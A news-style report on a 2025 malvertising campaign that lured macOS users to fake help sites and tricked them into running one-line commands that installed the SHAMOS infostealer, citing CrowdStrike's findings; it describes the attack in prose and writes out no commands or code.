A Deceptive Scheme Uncovered

In a shocking revelation, a sophisticated malvertising effort has been detected, targeting hundreds of organizations with a cunning plan to deploy a variant of the notorious Atomic macOS Stealer (AMOS). This aggressive campaign ran from June to August 2025, successfully luring victims to fake macOS help websites.

The Sinister Mechanics Behind the Attack

Unfortunately, victims were coaxed into executing a malicious one-line installation command, ultimately leading to infections from the SHAMOS variant of the AMOS infostealer. This malware is a creation of the infamous malware-as-a-service group known as Cookie Spider.

Impressive Defense by CrowdStrike

During this treacherous period, top cybersecurity firm CrowdStrike reported blocking attempts by the malvertising campaign that threatened to compromise over 300 environments of its customers. "This campaign highlights the alarming popularity of malicious one-line installation commands among cybercriminals," CrowdStrike remarked in a recent blog post.

Cybercriminals Finding Ways Around Security

The tactics used in this campaign are particularly insidious, enabling hackers to dodge essential Gatekeeper security checks and install the Mach-O executable—exclusively used by macOS—directly onto victims’ devices. This method has previously been exploited by other notorious groups in malicious Homebrew campaigns.

A Global Threat?

CrowdStrike's findings revealed that these deceptive sites popped up in various countries, including the UK, Japan, China, and Canada, among others. Notably, however, there were no reported victims in Russia, as local eCrime forums have restrictions against targeting users within their own borders.

The Deceptive Instructions

These fraudulent help sites presented victims with incorrect instructions on fixing their technological issues but deceptively lead them to execute a harmful one-line command. This command starts a chain reaction that downloads a file from a suspicious server, leading to password theft and the installation of the SHAMOS executable.

An Ongoing Threat

Since bringing this campaign to light, CrowdStrike's Counter Adversary Operations team has observed ongoing activity from opportunistic eCrime actors, who continue to exploit malicious GitHub repositories to trick victims into executing commands downloading SHAMOS malware. The firm warns that these cybercriminals are expected to persist in their use of malvertising and one-line installation tactics to disseminate macOS information stealers.